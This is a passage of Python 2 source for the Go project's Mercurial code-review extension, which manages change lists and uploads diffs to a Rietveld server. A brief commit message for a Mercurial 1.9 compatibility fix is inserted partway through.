    """Splits a patch into separate pieces for each file.

    Args:
      data: A string containing the output of svn diff.

    Returns:
      A list of 2-tuple (filename, text) where text is the svn diff output
        pertaining to filename.
    """
    result = []
    current_name = None
    current_lines = []
    for line in data.splitlines(True):
        next_name = None
        if line.startswith('Index:'):
            next_name = line.split(':', 1)[1].strip()
        elif line.startswith('Property changes on:'):
            # When a file is modified, paths use '/' between directories, however
            # when a property is modified '\' is used on Windows.  Make them the same
            # otherwise the file shows up twice.
            candidate = line.split(':', 1)[1].strip().replace('\\', '/')
            if candidate != current_name:
                # File has property changes but no modifications, create a new diff.
                next_name = candidate
        if next_name:
            # Starting a new file: flush the one accumulated so far.
            if current_name and current_lines:
                result.append((current_name, ''.join(current_lines)))
            current_name = next_name
            current_lines = [line]
            continue
        if current_lines is not None:
            current_lines.append(line)
    if current_name and current_lines:
        result.append((current_name, ''.join(current_lines)))
    return result
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
    """Uploads a separate patch for each file in the diff output.

    Returns a list of [patch_key, filename] for each file.
    """
    patches = SplitPatch(data)
    rv = []
    for patch in patches:
        set_status("uploading patch for " + patch[0])
        if len(patch[1]) > MAX_UPLOAD_SIZE:
            print ("Not uploading the patch for " + patch[0] +
                " because the file is too large.")
            continue
        form_fields = [("filename", patch[0])]
        if not options.download_base:
            form_fields.append(("content_upload", "1"))
        files = [("data", "data.diff", patch[1])]
        ctype, body = EncodeMultipartFormData(form_fields, files)
        url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
        print "Uploading patch for " + patch[0]
        response_body = rpc_server.Send(url, body, content_type=ctype)
        lines = response_body.splitlines()
        # On success the server replies "OK" followed by the patch key;
        # anything else is reported and aborts the upload.
        if not lines or lines[0] != "OK":
            StatusUpdate(" --> %s" % response_body)
            sys.exit(1)
        rv.append([lines[1], patch[0]])
    return rv
codereview: fix for Mercurial 1.9
R=golang-dev, mirtchovski, mikioh.mikioh
CC=golang-dev
http://codereview.appspot.com/4686049
Committer: Russ Cox <5ad239cb8a44f659eaaee0aa1ea5b94947abe557@golang.org>
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re, time
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
# The standard 'json' package is new in Python 2.6.
# Before that it was an external package named simplejson.
# Try the three known homes in order of preference.
try:
    # Standard location in 2.6 and beyond.
    import json
except Exception, e:
    try:
        # Conventional name for earlier package.
        import simplejson as json
    except:
        try:
            # Was also bundled with django, which is commonly installed.
            from django.utils import simplejson as json
        except:
            # We give up.
            raise e
# Compatibility shims for the range of Mercurial versions this
# extension supports: locate the version string, findcommonincoming,
# and the cmdutil/scmutil split, whichever home they live in.
try:
    hgversion = util.version()
except:
    from mercurial.version import version as v
    hgversion = v.get_version()

try:
    from mercurial.discovery import findcommonincoming
except:
    # Older Mercurial: the method lives on the repo object.
    def findcommonincoming(repo, remote):
        return repo.findcommonincoming(remote)

# in Mercurial 1.9 the cmdutil.match and cmdutil.revpair moved to scmutil
if hgversion >= '1.9':
    from mercurial import scmutil
else:
    scmutil = cmdutil

oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""

linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""

if hgversion < '1.3':
    msg = oldMessage
    if os.access("/etc/mercurial", 0):
        msg += linuxMessage
    raise util.Abort(msg)
def promptyesno(ui, msg):
    """Ask the user a yes/no question; return True for yes."""
    # Arguments to ui.prompt changed between 1.3 and 1.3.1.
    # Even so, some 1.3.1 distributions seem to have the old prompt!?!?
    # What a terrible way to maintain software.
    try:
        choice = ui.promptchoice(msg, ["&yes", "&no"], 0)
        return choice == 0
    except AttributeError:
        answer = ui.prompt(msg, ["&yes", "&no"], "y")
        return answer != "n"
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys

# Refuse to run as a script: this file only works as an hg extension.
if __name__ == "__main__":
    print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
    sys.exit(2)

# Module-level state; several of these are (re)assigned elsewhere in the
# file, outside this chunk, so the notes below are best-effort.
server = "codereview.appspot.com"  # default code review server host
server_url_base = None  # URL prefix for CL links; set after config is read
defaultcc = None  # default CC list (presumably from hgrc; set elsewhere)
contributors = {}  # contributor lookup table; populated elsewhere
missing_codereview = None  # presumably an error message when setup fails; set elsewhere
real_rollback = None  # presumably the original rollback command; set elsewhere
releaseBranch = None  # presumably the current release branch name; set elsewhere
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
    """Abort with a diagnostic unless s is exactly of type t."""
    actual = type(s)
    if actual != t:
        raise util.Abort("type check failed: %s has type %s != %s" % (repr(s), actual, t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
    # Require a byte string, then decode it as UTF-8.
    typecheck(s, str)
    return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii.  Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
    # mercurial.encoding.encoding holds Mercurial's global default encoding.
    from mercurial import encoding
    encoding.encoding = 'utf-8'

set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding.  I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
    """Force Python's process-wide default string encoding to UTF-8."""
    import sys
    reload(sys)  # site.py deleted setdefaultencoding; get it back
    sys.setdefaultencoding('utf-8')

default_to_utf8()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
# Placeholder diff uploaded when a CL carries no file diffs (see
# CL.Upload) — presumably because the server wants a non-empty patch;
# confirm against Rietveld's upload handler.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
    """A single change list: description, file list, people, server state."""

    def __init__(self, name):
        typecheck(name, str)
        self.name = name  # CL number as a string, or "new"
        self.desc = ''  # change description
        self.files = []  # files included in this change
        self.reviewer = []  # reviewer addresses
        self.cc = []  # CC addresses
        self.url = ''  # issue URL on the server, once known
        self.local = False  # a cl.<name> file exists in this repository
        self.web = False  # metadata was loaded from / synced to the server
        self.copied_from = None  # None means current user
        self.mailed = False  # review mail has been sent
        self.private = False  # issue is marked private

    def DiskText(self):
        """Render the CL in the format stored in .hg/codereview/cl.<name>."""
        cl = self
        s = ""
        if cl.copied_from:
            s += "Author: " + cl.copied_from + "\n\n"
        if cl.private:
            s += "Private: " + str(self.private) + "\n"
        s += "Mailed: " + str(self.mailed) + "\n"
        s += "Description:\n"
        s += Indent(cl.desc, "\t")
        s += "Files:\n"
        for f in cl.files:
            s += "\t" + f + "\n"
        typecheck(s, str)
        return s

    def EditorText(self):
        """Render the CL as text for the user's editor, with prolog."""
        cl = self
        s = _change_prolog
        s += "\n"
        if cl.copied_from:
            s += "Author: " + cl.copied_from + "\n"
        if cl.url != '':
            s += 'URL: ' + cl.url + '	# cannot edit\n\n'
        if cl.private:
            s += "Private: True\n"
        s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "CC: " + JoinComma(cl.cc) + "\n"
        s += "\n"
        s += "Description:\n"
        if cl.desc == '':
            s += "\t<enter description here>\n"
        else:
            s += Indent(cl.desc, "\t")
        s += "\n"
        if cl.local or cl.name == "new":
            s += "Files:\n"
            for f in cl.files:
                s += "\t" + f + "\n"
            s += "\n"
        typecheck(s, str)
        return s

    def PendingText(self):
        """Render a one-CL summary: name, description, people, files."""
        cl = self
        s = cl.name + ":" + "\n"
        s += Indent(cl.desc, "\t")
        s += "\n"
        if cl.copied_from:
            s += "\tAuthor: " + cl.copied_from + "\n"
        s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "\tCC: " + JoinComma(cl.cc) + "\n"
        s += "\tFiles:\n"
        for f in cl.files:
            s += "\t\t" + f + "\n"
        typecheck(s, str)
        return s

    def Flush(self, ui, repo):
        """Write this CL to disk; sync description changes to the server."""
        if self.name == "new":
            # A brand-new CL must be created on the server first so it
            # gets a real number to use as the file name.
            self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
        dir = CodeReviewDir(ui, repo)
        path = dir + '/cl.' + self.name
        # Write to path! then rename over path for an atomic-ish replace.
        f = open(path+'!', "w")
        f.write(self.DiskText())
        f.close()
        if sys.platform == "win32" and os.path.isfile(path):
            # Windows rename does not replace an existing file.
            os.remove(path)
        os.rename(path+'!', path)
        if self.web and not self.copied_from:
            EditDesc(self.name, desc=self.desc,
                reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
                private=self.private)

    def Delete(self, ui, repo):
        """Remove the local cl.<name> file."""
        dir = CodeReviewDir(ui, repo)
        os.unlink(dir + "/cl." + self.name)

    def Subject(self):
        """Return the mail subject line for this CL (first line of desc)."""
        s = line1(self.desc)
        if len(s) > 60:
            s = s[0:55] + "..."
        if self.name != "new":
            s = "code review %s: %s" % (self.name, s)
        typecheck(s, str)
        return s

    def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
        """Upload CL metadata (and diffs, when not creating) to the server."""
        if not self.files and not creating:
            ui.warn("no files in change list\n")
        if ui.configbool("codereview", "force_gofmt", True) and gofmt:
            CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
        set_status("uploading CL metadata + diffs")
        os.chdir(repo.root)
        form_fields = [
            ("content_upload", "1"),
            ("reviewers", JoinComma(self.reviewer)),
            ("cc", JoinComma(self.cc)),
            ("description", self.desc),
            ("base_hashes", ""),
        ]
        if self.name != "new":
            form_fields.append(("issue", self.name))
        vcs = None
        # We do not include files when creating the issue,
        # because we want the patch sets to record the repository
        # and base revision they are diffs against.  We use the patch
        # set message for that purpose, but there is no message with
        # the first patch set.  Instead the message gets used as the
        # new CL's overall subject.  So omit the diffs when creating
        # and then we'll run an immediate upload.
        # This has the effect that every CL begins with an empty "Patch set 1".
        if self.files and not creating:
            vcs = MercurialVCS(upload_options, ui, repo)
            data = vcs.GenerateDiff(self.files)
            files = vcs.GetBaseFiles(data)
            if len(data) > MAX_UPLOAD_SIZE:
                # Too big for one request: send per-file patches afterward.
                uploaded_diff_file = []
                form_fields.append(("separate_patches", "1"))
            else:
                uploaded_diff_file = [("data", "data.diff", data)]
        else:
            uploaded_diff_file = [("data", "data.diff", emptydiff)]
        if vcs and self.name != "new":
            form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + getremote(ui, repo, {}).path))
        else:
            # First upload sets the subject for the CL itself.
            form_fields.append(("subject", self.Subject()))
        ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
        response_body = MySend("/upload", body, content_type=ctype)
        # Response format: message line, patchset id line, then
        # "patch-id filename" lines.
        patchset = None
        msg = response_body
        lines = msg.splitlines()
        if len(lines) >= 2:
            msg = lines[0]
            patchset = lines[1].strip()
            patches = [x.split(" ", 1) for x in lines[2:]]
        if response_body.startswith("Issue updated.") and quiet:
            pass
        else:
            ui.status(msg + "\n")
        set_status("uploaded CL metadata + diffs")
        if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
            raise util.Abort("failed to update issue: " + response_body)
        # The issue number is the trailing path component of the reply URL.
        issue = msg[msg.rfind("/")+1:]
        self.name = issue
        if not self.url:
            self.url = server_url_base + self.name
        if not uploaded_diff_file:
            set_status("uploading patches")
            patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
        if vcs:
            set_status("uploading base files")
            vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
        if send_mail:
            set_status("sending mail")
            MySend("/" + issue + "/mail", payload="")
        self.web = True
        set_status("flushing changes to disk")
        self.Flush(ui, repo)
        return

    def Mail(self, ui, repo):
        """Send the review-request (or "take another look") message."""
        pmsg = "Hello " + JoinComma(self.reviewer)
        if self.cc:
            pmsg += " (cc: %s)" % (', '.join(self.cc),)
        pmsg += ",\n"
        pmsg += "\n"
        repourl = getremote(ui, repo, {}).path
        if not self.mailed:
            pmsg += "I'd like you to review this change to\n" + repourl + "\n"
        else:
            pmsg += "Please take another look.\n"
        typecheck(pmsg, str)
        PostMessage(ui, self.name, pmsg, subject=self.Subject())
        self.mailed = True
        self.Flush(ui, repo)
def GoodCLName(name):
    """Report whether name is a well-formed CL number (digits only).

    Returns the regexp match object (truthy) or None.
    """
    typecheck(name, str)
    match = re.match("^[0-9]+$", name)
    return match
def ParseCL(text, name):
    """Parse the on-disk text of CL `name` into a CL object.

    Returns (cl, 0, '') on success, or (None, lineno, errmsg) pointing
    at the first malformed line.
    """
    typecheck(text, str)
    typecheck(name, str)
    sname = None  # name of the section currently being collected
    lineno = 0
    sections = {
        'Author': '',
        'Description': '',
        'Files': '',
        'URL': '',
        'Reviewer': '',
        'CC': '',
        'Mailed': '',
        'Private': '',
    }
    for line in text.split('\n'):
        lineno += 1
        line = line.rstrip()
        if line != '' and line[0] == '#':
            continue
        if line == '' or line[0] == ' ' or line[0] == '\t':
            # Indented (or blank) lines belong to the current section.
            if sname == None and line != '':
                return None, lineno, 'text outside section'
            if sname != None:
                sections[sname] += line + '\n'
            continue
        # Unindented line: must start a known "Name:" section.
        p = line.find(':')
        if p >= 0:
            s, val = line[:p].strip(), line[p+1:].strip()
            if s in sections:
                sname = s
                if val != '':
                    sections[sname] += val + '\n'
                continue
        return None, lineno, 'malformed section header'
    for k in sections:
        sections[k] = StripCommon(sections[k]).rstrip()
    cl = CL(name)
    if sections['Author']:
        cl.copied_from = sections['Author']
    cl.desc = sections['Description']
    for line in sections['Files'].split('\n'):
        # Strip trailing comments and surrounding whitespace from file names.
        i = line.find('#')
        if i >= 0:
            line = line[0:i].rstrip()
        line = line.strip()
        if line == '':
            continue
        cl.files.append(line)
    cl.reviewer = SplitCommaSpace(sections['Reviewer'])
    cl.cc = SplitCommaSpace(sections['CC'])
    cl.url = sections['URL']
    if sections['Mailed'] != 'False':
        # Odd default, but avoids spurious mailings when
        # reading old CLs that do not have a Mailed: line.
        # CLs created with this update will always have
        # Mailed: False on disk.
        cl.mailed = True
    if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
        cl.private = True
    if cl.desc == '<enter description here>':
        cl.desc = ''
    return cl, 0, ''
def SplitCommaSpace(s):
    """Split a comma-separated string into a list, tolerating spaces."""
    typecheck(s, str)
    trimmed = s.strip()
    if not trimmed:
        return []
    return re.split(", *", trimmed)
def CutDomain(s):
    """Return the local part of an email address (text before '@')."""
    typecheck(s, str)
    at = s.find('@')
    if at >= 0:
        return s[0:at]
    return s
def JoinComma(l):
    """Join a list of byte strings with ", ", type-checking each element."""
    for item in l:
        typecheck(item, str)
    return ", ".join(l)
def ExceptionDetail():
    """Describe the exception currently being handled as "Type: detail"."""
    name = str(sys.exc_info()[0])
    # str() of an exception class is "<type 'X'>" (Python 2 old style)
    # or "<class 'X'>"; unwrap it to the bare name X.
    if name.startswith("<type '") and name.endswith("'>"):
        name = name[7:-2]
    elif name.startswith("<class '") and name.endswith("'>"):
        name = name[8:-2]
    detail = str(sys.exc_info()[1])
    if len(detail) > 0:
        name += ": " + detail
    return name
def IsLocalCL(ui, repo, name):
    # Truthy when name is a valid CL number AND a cl.<name> file exists in
    # this repository's codereview directory.  Short-circuit matters:
    # CodeReviewDir is only consulted for well-formed names.
    return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
    """Return (cl, '') for CL `name`, or (None, errmsg) on failure.

    Reads the local cl.<name> file when present; when web is true, also
    fetches and merges issue metadata from the code review server.
    """
    typecheck(name, str)
    set_status("loading CL " + name)
    if not GoodCLName(name):
        return None, "invalid CL name"
    dir = CodeReviewDir(ui, repo)
    path = dir + "cl." + name
    if os.access(path, 0):
        ff = open(path)
        text = ff.read()
        ff.close()
        cl, lineno, err = ParseCL(text, name)
        if err != "":
            return None, "malformed CL data: "+err
        cl.local = True
    else:
        cl = CL(name)
    if web:
        set_status("getting issue metadata from web")
        d = JSONGet(ui, "/api/" + name + "?messages=true")
        set_status(None)
        if d is None:
            return None, "cannot load CL %s from server" % (name,)
        # Sanity-check the reply really describes this issue.
        if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
            return None, "malformed response loading CL data from code review server"
        cl.dict = d
        cl.reviewer = d.get('reviewers', [])
        cl.cc = d.get('cc', [])
        if cl.local and cl.copied_from and cl.desc:
            # local copy of CL written by someone else
            # and we saved a description.  use that one,
            # so that committers can edit the description
            # before doing hg submit.
            pass
        else:
            cl.desc = d.get('description', "")
        cl.url = server_url_base + name
        cl.web = True
        cl.private = d.get('private', False) != False
    set_status("loaded CL " + name)
    return cl, ''
# Most recent status message, shown periodically by StatusThread;
# None means nothing to display.
global_status = None

def set_status(s):
    """Record s as the current status message (read by StatusThread)."""
    # print >>sys.stderr, "\t", time.asctime(), s
    global global_status
    global_status = s
class StatusThread(threading.Thread):
    """Background thread that periodically prints global_status to stderr."""
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        # pause a reasonable amount of time before
        # starting to display status messages, so that
        # most hg commands won't ever see them.
        time.sleep(30)
        # now show status every 15 seconds
        while True:
            # Sleep to the next 15-second wall-clock boundary.
            time.sleep(15 - time.time() % 15)
            s = global_status
            if s is None:
                continue
            if s == "":
                s = "(unknown status)"
            print >>sys.stderr, time.asctime(), s
def start_status_thread():
	# Launch the background status reporter. Marking it as a
	# daemon means the process is allowed to exit even while
	# the thread is still running.
	reporter = StatusThread()
	reporter.setDaemon(True)
	reporter.start()
# Helper thread for LoadAllCL: loads the single CL file self.f and
# leaves the result in self.cl (None if loading failed).
class LoadCLThread(threading.Thread):
	def __init__(self, ui, repo, dir, f, web):
		threading.Thread.__init__(self)
		self.ui = ui
		self.repo = repo
		self.dir = dir
		self.f = f
		self.web = web
		self.cl = None
	def run(self):
		# File names look like "cl.<number>"; strip the "cl." prefix.
		cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
		if err != '':
			self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
			return
		self.cl = cl
# Load all the CLs from this repository.
# Returns a map from CL name to CL object; CLs that fail to load
# are warned about and omitted. Loading is parallelized across
# threads because each web load is a network round trip.
def LoadAllCL(ui, repo, web=True):
	dir = CodeReviewDir(ui, repo)
	m = {}
	files = [f for f in os.listdir(dir) if f.startswith('cl.')]
	if not files:
		return m
	active = []
	first = True
	for f in files:
		t = LoadCLThread(ui, repo, dir, f, web)
		t.start()
		if web and first:
			# first request: wait in case it needs to authenticate
			# otherwise we get lots of user/password prompts
			# running in parallel.
			t.join()
			if t.cl:
				m[t.cl.name] = t.cl
			first = False
		else:
			active.append(t)
	# Collect the remaining threads' results.
	for t in active:
		t.join()
		if t.cl:
			m[t.cl.name] = t.cl
	return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
	# Only file:// repositories have a usable local path.
	url = repo.url()
	if not url.startswith('file:'):
		ui.warn("repository %s is not in local file system\n" % (url,))
		return None
	# Drop the "file:" scheme prefix and a single trailing slash.
	url = url[5:]
	if url[-1:] == '/':
		url = url[:-1]
	typecheck(url, str)
	return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
	dir = RepoDir(ui, repo)
	if dir == None:
		return None
	# Per-repository scratch space where cl.<name> state files live.
	dir += '/.hg/codereview/'
	if not os.path.isdir(dir):
		try:
			# Owner-only permissions: CL files can reference private issues.
			os.mkdir(dir, 0700)
		except:
			ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
			return None
	typecheck(dir, str)
	return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
	# Count the run of leading tabs, then rebuild the line with
	# eight spaces standing in for each tab.
	ntabs = len(line) - len(line.lstrip('\t'))
	return ' ' * (8 * ntabs) + line[ntabs:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
	typecheck(text, str)
	# First pass: compute ws, the longest whitespace prefix shared
	# by all non-blank lines (tabs normalized to 8 spaces first).
	ws = None
	for line in text.split('\n'):
		line = line.rstrip()
		if line == '':
			continue
		line = TabsToSpaces(line)
		white = line[:len(line)-len(line.lstrip())]
		if ws == None:
			ws = white
		else:
			# Shrink ws to the common prefix of ws and white.
			common = ''
			for i in range(min(len(white), len(ws))+1):
				if white[0:i] == ws[0:i]:
					common = white[0:i]
			ws = common
		if ws == '':
			break
	if ws == None:
		return text
	# Second pass: strip the prefix, drop leading blank lines, and
	# collapse trailing blank lines down to a single newline.
	t = ''
	for line in text.split('\n'):
		line = line.rstrip()
		line = TabsToSpaces(line)
		if line.startswith(ws):
			line = line[len(ws):]
		if line == '' and t == '':
			continue
		t += line + '\n'
	while len(t) >= 2 and t[-2:] == '\n\n':
		t = t[:-1]
	typecheck(t, str)
	return t
# Indent text with indent.
def Indent(text, indent):
	typecheck(text, str)
	typecheck(indent, str)
	# Prefix every split piece (including a trailing empty one),
	# so the result always ends with a newline, as before.
	pieces = []
	for ln in text.split('\n'):
		pieces.append(indent + ln + '\n')
	t = ''.join(pieces)
	typecheck(t, str)
	return t
# Return the first line of l
def line1(text):
	typecheck(text, str)
	# partition('\n')[0] is the first line; equivalent to
	# split('\n')[0] without building the whole list.
	return text.partition('\n')[0]
# Boilerplate prepended to the editable CL text (the '#' lines
# inside the string are instructions shown to the user's editor).
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions
# Get effective change nodes taking into account applied MQ patches
def effective_revpair(repo):
	try:
		# With MQ patches applied, diff against qparent so the
		# patch contents themselves count as local changes.
		return scmutil.revpair(repo, ['qparent'])
	except:
		# No MQ queue (or 'qparent' unknown): default revision pair.
		return scmutil.revpair(repo, None)
# Return list of changed files in repository that match pats.
# Warn about patterns that did not match.
def matchpats(ui, repo, pats, opts):
	# Full 7-tuple status (modified, added, removed, deleted,
	# unknown, ignored, clean) against the effective parent.
	matcher = scmutil.match(repo, pats, opts)
	node1, node2 = effective_revpair(repo)
	modified, added, removed, deleted, unknown, ignored, clean = repo.status(node1, node2, matcher, ignored=True, clean=True, unknown=True)
	return (modified, added, removed, deleted, unknown, ignored, clean)
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, opts, taken=None):
	taken = taken or {}
	# Run each pattern separately so that we can warn about
	# patterns that didn't do anything useful.
	for p in pats:
		modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
		redo = False
		for f in unknown:
			promptadd(ui, repo, f)
			redo = True
		for f in deleted:
			promptremove(ui, repo, f)
			redo = True
		if redo:
			# The prompts may have added/removed files; re-query.
			modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
		for f in modified + added + removed:
			if f in taken:
				ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
		if not modified and not added and not removed:
			ui.warn("warning: %s did not match any modified files\n" % (p,))
	# Again, all at once (eliminates duplicates)
	modified, added, removed = matchpats(ui, repo, pats, opts)[:3]
	l = modified + added + removed
	l.sort()
	if taken:
		# Drop files already claimed by other CLs.
		l = Sub(l, taken.keys())
	return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
	# Only the modified and added buckets can still exist on disk;
	# removed/deleted files are deliberately excluded.
	status = matchpats(ui, repo, pats, opts)
	result = status[0] + status[1]
	result.sort()
	return result
# Return list of files claimed by existing CLs
def Taken(ui, repo):
	# Build a map from file name to the local CL that lists it.
	claimed = {}
	for cl in LoadAllCL(ui, repo, web=False).values():
		for name in cl.files:
			claimed[name] = cl
	return claimed
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats, opts):
	# Files already assigned to a CL are filtered out via taken.
	claimed = Taken(ui, repo)
	return ChangedFiles(ui, repo, pats, opts, taken=claimed)
# Set difference: elements of l1 not in l2, preserving l1's order.
def Sub(l1, l2):
	out = []
	for x in l1:
		if x not in l2:
			out.append(x)
	return out
# Sorted union: l1 plus any elements of l2 not already in l1.
def Add(l1, l2):
	merged = l1 + Sub(l2, l1)
	merged.sort()
	return merged
# Intersection: elements of l1 also present in l2, in l1's order.
def Intersect(l1, l2):
	out = []
	for x in l1:
		if x in l2:
			out.append(x)
	return out
# Return a peer repository object for the default push/pull path.
def getremote(ui, repo, opts):
	# save $http_proxy; creating the HTTP repo object will
	# delete it in an attempt to "help"
	proxy = os.environ.get('http_proxy')
	source = hg.parseurl(ui.expandpath("default"), None)[0]
	try:
		remoteui = hg.remoteui # hg 1.6
	except:
		# Older Mercurial keeps remoteui in cmdutil instead.
		remoteui = cmdutil.remoteui
	other = hg.repository(remoteui(repo, opts), source)
	if proxy is not None:
		# Restore the proxy setting clobbered above.
		os.environ['http_proxy'] = proxy
	return other
def Incoming(ui, repo, opts):
	# Changesets present on the default remote but missing locally.
	# findcommonincoming returns (common, incoming, remote heads);
	# only the incoming list matters here.
	remote = getremote(ui, repo, opts)
	return findcommonincoming(repo, remote)[1]
# Pattern a conventional CL description's first line must match:
# "pkg: summary", a tag/release/weekly commit, "fix build", or "undo CL".
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
# Warning shown by EditCL when the description does not match desc_re.
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptremove(ui, repo, f):
	# Offer to "hg remove" a file that was deleted from the
	# working directory but is still tracked.
	if not promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
		return
	if commands.remove(ui, repo, 'path:'+f) != 0:
		ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
	# Offer to "hg add" a file that exists but is unknown to hg.
	if not promptyesno(ui, "hg add %s (y/n)?" % (f,)):
		return
	if commands.add(ui, repo, 'path:'+f) != 0:
		ui.warn("error adding %s" % (f,))
# Open cl in the user's editor and loop until the edited text
# parses and passes sanity checks, then copy the edited fields
# back into cl. Returns "" on success or an error string if the
# CL was left unmodified.
def EditCL(ui, repo, cl):
	set_status(None) # do not show status
	s = cl.EditorText()
	while True:
		s = ui.edit(s, ui.username())
		clx, line, err = ParseCL(s, cl.name)
		if err != '':
			if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
				return "change list not modified"
			continue
		# Check description.
		if clx.desc == '':
			if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
				continue
		elif re.search('<enter reason for undo>', clx.desc):
			if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
				continue
		elif not re.match(desc_re, clx.desc.split('\n')[0]):
			if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
				continue
		# Check file list for files that need to be hg added or hg removed
		# or simply aren't understood.
		pats = ['path:'+f for f in clx.files]
		modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, pats, {})
		files = []
		for f in clx.files:
			if f in modified or f in added or f in removed:
				files.append(f)
				continue
			if f in deleted:
				promptremove(ui, repo, f)
				files.append(f)
				continue
			if f in unknown:
				promptadd(ui, repo, f)
				files.append(f)
				continue
			if f in ignored:
